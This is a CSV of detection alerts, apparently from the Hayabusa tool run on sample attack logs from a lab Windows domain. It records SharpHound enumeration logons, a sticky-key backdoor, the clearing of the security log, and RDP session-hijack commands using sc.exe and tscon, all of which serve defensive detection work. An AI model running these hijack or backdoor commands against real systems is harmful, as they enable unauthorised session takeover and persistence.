2021-05-03 17:58:25.949 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f31435,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:25.950 +09:00,atanids01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x88f31447,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.674 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e27259,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.677 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc2f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.679 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe8573e4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.685 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e27296,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.686 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc329,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.686 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e272a9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.687 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc34a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.687 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe857415,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.688 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe85742e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.689 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.689 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd720,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.689 +09:00,wsus01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4cc36c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.690 +09:00,dhcp01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x61e272d5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.691 +09:00,exchange01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0xbe857459,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.712 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd78b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.713 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd7a6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.713 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4c2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.714 +09:00,atacore01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x3a7fd7ba,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.715 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4dc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.718 +09:00,pki01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22c8a4f7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.722 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f27d0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.733 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f27f0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.734 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f2809,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.735 +09:00,mssql01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2a1f281b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.742 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x222004fb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.742 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9e7c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.752 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22200531,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x2220054d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.753 +09:00,prtg-mon.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x22200565,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.762 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfbef,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.762 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a22,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.771 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc1c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.771 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a5a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.772 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a76,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.773 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x28da8a88,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc3f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.773 +09:00,adfs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x213dfc4d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.774 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9ee5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9ef8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 17:58:38.775 +09:00,webiis01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x258b9efd,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4799-4624-Local admin group enumerated by SharpHound.evtx
2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: C:\windows\system32\cmd.exe sethc.exe 211 | Process: C:\Windows\System32\cmd.exe | User: OFFSEC\admmig | Parent Cmd: winlogon.exe | LID: 0xb7e34 | PID: 3300 | PGUID: 9828DA72-E761-608F-2A14-000000000C00 | Hash: SHA1=F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D,MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx
2021-05-03 21:06:57.954 +09:00,win10-02.offsec.lan,1,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/process_creation/proc_creation_win_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx
2021-05-03 21:07:07.639 +09:00,win10-02.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\mmc.exe | PID: 7272 | PGUID: 9828DA72-683B-6089-DB05-000000000C00",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID1-CMD executed via sticky key call.evtx
2021-05-15 05:39:33.214 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx
2021-05-15 05:39:35.382 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,"Cmd Line: sc.exe create hijackservice binpath= ""cmd.exe /k tscon 2 /dest:rdp-tcp#5"" | Path: C:\Windows\System32\sc.exe | PID: 0xbd8 | User: admmig | LID: 0x13b593d",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx
2021-05-15 05:39:35.382 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc.exe create hijackservice binpath= ""cmd.exe /k tscon 2 /dest:rdp-tcp#5"" | Path: C:\Windows\System32\sc.exe | PID: 0xbd8 | User: admmig | LID: 0x13b593d",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-4697 RDP hijack via service creation.evtx
2021-05-15 05:40:16.839 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start hijackservice | Path: C:\Windows\System32\sc.exe | PID: 0x1490 | User: admmig | LID: 0x13b593d,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
2021-05-15 05:40:16.846 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\cmd.exe | PID: 0x1278 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
2021-05-15 05:40:16.846 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /k tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\cmd.exe | PID: 0x1278 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
2021-05-15 05:40:16.853 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest:rdp-tcp#5 | Path: C:\Windows\System32\tscon.exe | PID: 0x143c | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
2021-05-15 05:40:18.194 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
2021-05-15 05:40:18.327 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeb4 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
2021-05-15 05:40:26.942 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1578 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
2021-05-15 05:40:29.455 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s | Path: C:\Windows\System32\mmc.exe | PID: 0x864 | User: admmarsid | LID: 0x6a423",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
2021-05-15 05:40:29.640 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144c | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
2021-05-15 05:40:29.676 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe84 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
2021-05-15 05:40:29.706 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /s | Path: C:\Windows\System32\mmc.exe | PID: 0xcc8 | User: FS01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688-4778 RDP hijack command execution.evtx
2021-05-15 06:01:05.352 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd /k tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\cmd.exe | PID: 0x378 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
2021-05-15 06:01:05.352 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd /k tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\cmd.exe | PID: 0x378 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
2021-05-15 06:01:05.358 +09:00,fs01.offsec.lan,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest:rdp-tcp#8 | Path: C:\Windows\System32\tscon.exe | PID: 0x6e8 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
2021-05-15 06:01:07.150 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{133EAC4F-5891-4D04-BADA-D84870380A80} | Path: C:\Windows\System32\dllhost.exe | PID: 0x460 | User: FS01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4688,4778,4779 RDP hijack direct.evtx"
